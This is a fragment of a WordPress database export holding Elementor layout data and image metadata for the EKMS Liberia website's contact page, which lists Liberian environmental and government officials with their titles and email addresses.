op\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14857,2356,'_elementor_controls_usage','a:6:{s:7:\"heading\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:1;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:3:{s:11:\"title_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:35;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:6:\"layout\";a:1:{s:12:\"_inline_size\";i:32;}}}}s:7:\"section\";a:3:{s:5:\"count\";i:14;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:6:\"layout\";a:2:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:14;}s:17:\"section_structure\";a:1:{s:9:\"structure\";i:11;}}}}s:11:\"text-editor\";a:3:{s:5:\"count\";i:15;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:15;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:4:{s:10:\"text_color\";i:14;s:21:\"typography_typography\";i:14;s:20:\"typography_font_size\";i:14;s:5:\"align\";i:13;}}}}s:6:\"spacer\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:14:\"section_spacer\";a:1:{s:5:\"space\";i:1;}}}}s:5:\"image\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:13:\"section_image\";a:3:{s:5:\"image\";i:2;s:10:\"image_size\";i:2;s:22:\"image_custom_dimension\";i:1;}}}}}'),(14859,2357,'_wp_attached_file','2019/11/knowledge_broker_BJ-1.jpg'),(14860,2357,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1855;s:6:\"height\";i:1596;s:4:\"file\";s:33:\"2019/11/knowledge_broker_BJ-1.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"knowledge_broker_BJ-1-300x258.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:258;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"knowledge_broker_BJ-1-1024x881.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:881;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"knowledge_broker_BJ-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"knowledge_broker_BJ-1-768x661.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:661;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:35:\"knowledge_broker_BJ-1-1536x1322.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1322;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"3\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:12:\"COOLPIX P530\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1545498445\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"4.3\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14868,2359,'_wp_attached_file','2019/11/knowledge_broker_BK.jpg'),(14869,2359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:31:\"2019/11/knowledge_broker_BK.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_BK-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_BK-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14870,2360,'_wp_attached_file','2019/11/knowledge_broker_KT.jpg'),(14871,2360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:700;s:6:\"height\";i:652;s:4:\"file\";s:31:\"2019/11/knowledge_broker_KT.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_KT-300x279.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:279;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"knowledge_broker_KT-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1573849962\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(14872,2361,'_elementor_edit_mode','builder'),(14873,2361,'_elementor_template_type','wp-page'),(14874,2361,'_elementor_version','2.7.5'),(14875,2361,'_wp_page_template','default'),(14876,2361,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a 